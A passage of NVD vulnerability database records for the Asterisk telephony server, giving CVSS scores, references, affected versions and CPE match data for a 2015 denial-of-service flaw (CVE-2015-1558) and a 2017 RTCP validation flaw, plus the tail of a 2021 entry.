          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-07-30T14:15:16.910",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2021/dsa-4999"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2021/dsa-4999"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-74"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2015-02-09 11:59

Modified

2024-11-21 02:25

Severity ?

Summary

Asterisk Open Source 12.x before 12.8.1 and 13.x before 13.1.1, when using the PJSIP channel driver, does not properly reclaim RTP ports, which allows remote authenticated users to cause a denial of service (file descriptor consumption) via an SDP offer containing only incompatible codecs.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2015-001.html	Vendor Advisory
cve@mitre.org	http://seclists.org/fulldisclosure/2015/Jan/116
cve@mitre.org	http://www.securityfocus.com/archive/1/534573/100/0/threaded
cve@mitre.org	http://www.securitytracker.com/id/1031661
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2015-001.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2015/Jan/116
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/534573/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1031661

Impacted products

Vendor	Product	Version
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.1
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.1
digium	asterisk	12.3.2
digium	asterisk	12.4.0
digium	asterisk	12.4.0
digium	asterisk	12.5.0
digium	asterisk	12.5.0
digium	asterisk	12.6.0
digium	asterisk	12.6.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.8.0
digium	asterisk	12.8.0
digium	asterisk	12.8.0
digium	asterisk	12.8.1
digium	asterisk	13.0.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.2.0
digium	asterisk	13.2.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3CD4A85-26FB-4AE5-9CB7-4DF38DF32482",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8DD16DF-C47C-41CF-8CDE-C365103262A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "43C06F98-62F4-4008-A463-2791BEDF6DED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "133288EC-8A78-4C9D-BF94-9900CD3D2260",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B2E54998-B257-478E-9E52-2BB4F4CD6429",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FD4498A-72BD-40EB-A332-DE10C87C1015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71961599-009C-42F4-AA26-9B16C39F3CBC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B98A2EA6-DCC6-4F8B-B132-6692AED16CF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "672EDC0E-D70A-4BB0-B7FE-5D422C737862",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "C779E0D4-0375-4BE8-9667-A32C68B66D60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8E9E50F8-0123-4C9E-88E1-5DCE08770B68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F7C605A3-8517-4215-9AD3-980D587B22DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "44746060-BC6F-4E6D-BA81-61623B2D27FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47548ADE-255A-4355-BD06-1FEF134C1620",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "ABCFC4D9-8054-4F42-BE7E-5092F6648F95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "84A7DBB5-999C-4AE8-BC5D-F0C5F77957DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B635C21-C193-43AF-A139-98604F324ABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "890EBB8C-989B-4344-AC03-62B399076008",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BD4AAECB-A2BC-45BA-BC63-E51C1FE6C334",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AEC2B3AA-EB24-4259-BED1-5DBC102FE9C1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk Open Source 12.x before 12.8.1 and 13.x before 13.1.1, when using the PJSIP channel driver, does not properly reclaim RTP ports, which allows remote authenticated users to cause a denial of service (file descriptor consumption) via an SDP offer containing only incompatible codecs."
    },
    {
      "lang": "es",
      "value": "Asterisk Open Source 12.x anterior a 12.8.1 y 13.x anterior a 13.1.1, cuando utiliza el controlador de canales PJSIP, no recupera correctamente los puertos RTP, lo que permite a usuarios remotos autenticados causar una denegaci\u00f3n de servicio (consumo del descriptor de ficheros) a trav\u00e9s de una oferta SDP que contiene solamente codecs incompatibles."
    }
  ],
  "id": "CVE-2015-1558",
  "lastModified": "2024-11-21T02:25:38.930",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2015-02-09T11:59:00.067",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2015-001.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/fulldisclosure/2015/Jan/116"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/534573/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1031661"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2015-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2015/Jan/116"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/534573/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1031661"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-399"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-10-10 01:30

Modified

2024-11-21 03:13

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

In Asterisk 11.x before 11.25.3, 13.x before 13.17.2, and 14.x before 14.6.2 and Certified Asterisk 11.x before 11.6-cert18 and 13.x before 13.13-cert6, insufficient RTCP packet validation could allow reading stale buffer contents and when combined with the "nat" and "symmetric_rtp" options allow redirecting where Asterisk sends the next RTCP report.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2017-008.html	Vendor Advisory
cve@mitre.org	http://www.debian.org/security/2017/dsa-3990	Third Party Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27274	Issue Tracking, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2017-008.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2017/dsa-3990	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27274	Issue Tracking, Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.0.2
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.1
digium	asterisk	13.2.0
digium	asterisk	13.2.0
digium	asterisk	13.2.1
digium	asterisk	13.3.0
digium	asterisk	13.3.2
digium	asterisk	13.4.0
digium	asterisk	13.4.0
digium	asterisk	13.5.0
digium	asterisk	13.5.0
digium	asterisk	13.6.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	asterisk	13.7.1
digium	asterisk	13.7.2
digium	asterisk	13.8.0
digium	asterisk	13.8.0
digium	asterisk	13.8.1
digium	asterisk	13.8.2
digium	asterisk	13.9.0
digium	asterisk	13.9.1
digium	asterisk	13.10.0
digium	asterisk	13.10.0
digium	asterisk	13.11.0
digium	asterisk	13.11.1
digium	asterisk	13.11.2
digium	asterisk	13.12
digium	asterisk	13.12.0
digium	asterisk	13.12.1
digium	asterisk	13.12.2
digium	asterisk	13.13
digium	asterisk	13.13.0
digium	asterisk	13.13.1
digium	asterisk	13.14.0
digium	asterisk	13.14.0
digium	asterisk	13.14.0
digium	asterisk	13.14.1
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.1
digium	asterisk	13.16.0
digium	asterisk	13.16.0
digium	asterisk	13.16.0
digium	asterisk	13.17.0
digium	asterisk	13.17.0
digium	asterisk	14.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.1
digium	asterisk	14.0.2
digium	asterisk	14.1
digium	asterisk	14.01
digium	asterisk	14.1.0
digium	asterisk	14.1.1
digium	asterisk	14.1.2
digium	asterisk	14.02
digium	asterisk	14.2
digium	asterisk	14.2.0
digium	asterisk	14.2.1
digium	asterisk	14.3.0
digium	asterisk	14.3.0
digium	asterisk	14.3.0
digium	asterisk	14.3.1
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.1
digium	asterisk	14.5.0
digium	asterisk	14.5.0
digium	asterisk	14.5.0
digium	asterisk	14.6.0
digium	asterisk	14.6.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.1
digium	asterisk	11.2.2
digium	asterisk	11.4.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.1
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	asterisk	11.10.1
digium	asterisk	11.10.1
digium	asterisk	11.10.2
digium	asterisk	11.11.0
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	11.12.0
digium	asterisk	11.12.1
digium	asterisk	11.13.0
digium	asterisk	11.13.0
digium	asterisk	11.13.1
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.1
digium	asterisk	11.14.2
digium	asterisk	11.15.0
digium	asterisk	11.15.0
digium	asterisk	11.15.1
digium	asterisk	11.16.0
digium	asterisk	11.17.0
digium	asterisk	11.17.1
digium	asterisk	11.18.0
digium	asterisk	11.18.0
digium	asterisk	11.19.0
digium	asterisk	11.20.0
digium	asterisk	11.21.0
digium	asterisk	11.21.0
digium	asterisk	11.21.1
digium	asterisk	11.21.2
digium	asterisk	11.22.0
digium	asterisk	11.22.0
digium	asterisk	11.23.0
digium	asterisk	11.23.0
digium	asterisk	11.23.1
digium	asterisk	11.24.0
digium	asterisk	11.24.1
digium	asterisk	11.25.0
digium	asterisk	11.25.1
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "E7D1238A-A8D2-485E-81FD-46038A883EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "E93A7967-9A04-424A-BDDB-A2B8289B9AC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "8F75C9FF-6F95-4F6A-B683-FE2BEDE3AD10",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "68226156-42ED-4F0E-93E1-02DD57E582B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A4EB385E-28B5-4259-9431-99E1F32D61B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "890EBB8C-989B-4344-AC03-62B399076008",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BD4AAECB-A2BC-45BA-BC63-E51C1FE6C334",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "121EACD3-D5E3-4691-8024-95996865BB65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AEC2B3AA-EB24-4259-BED1-5DBC102FE9C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "74B23D17-7356-4D37-8C73-E87896D1335B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CEA9DA4A-A3E6-4C46-9471-CCBFA71083AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "81A8A6CB-D236-4AB3-8476-C2D34DB7EF31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "599833A2-CBE9-479B-8A6E-AF79C5EED1DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B55719B3-7325-47E1-8D16-3F34B1F44385",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B870B3B7-E8DC-45A2-8FA4-657D005D00E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C91E9A3B-54EB-4819-94DD-30F7D0C90047",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47189DF9-8E57-4BA6-9F52-B7A8229AE02A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "84AAFA3C-3CCD-4615-9725-169C303CF18F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C92E0801-9E8F-4CF2-A4A0-48BCF550F2D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C1C39FA-EF1A-4F2B-87A0-A00BAE73C6A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "677D1211-0B07-47B9-AB7A-E820E2B29561",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "84202BAF-29E1-472B-B11F-B73F6A8891CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FFC7120D-E6A0-4801-A1CC-3E143896EE72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "BAF2A83D-D9AE-441D-8D4E-335BF9D28A63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F5C1479-A540-4B7D-B00C-BD35EEC83BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC12556C-5E82-47D7-87E5-FBDC01A920DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "461C1D2D-C4C1-4FF8-8231-38A2505F3523",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "66595711-8573-4A9B-A8FE-4943E3097AA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FE3D4-A0B9-475A-9B89-B0222283A6A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9670B5AC-CBD1-484C-90F8-69B1A60B6054",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE5794B6-246C-415E-8E20-56447F152488",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E726CA39-A763-4422-B59E-E9E12518EA4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A96EB57-835A-45B4-82F5-31F925A85629",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "206F1DC9-9E8F-4497-A354-4A14711993DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D428364-E2AD-4BC6-9329-71793BC0EB61",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "08963910-E0BD-4487-B669-60E0BFA79863",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "86B16D04-3808-4380-8F64-0C36B185C1F2",
              "vulnerable": true
            },
            {
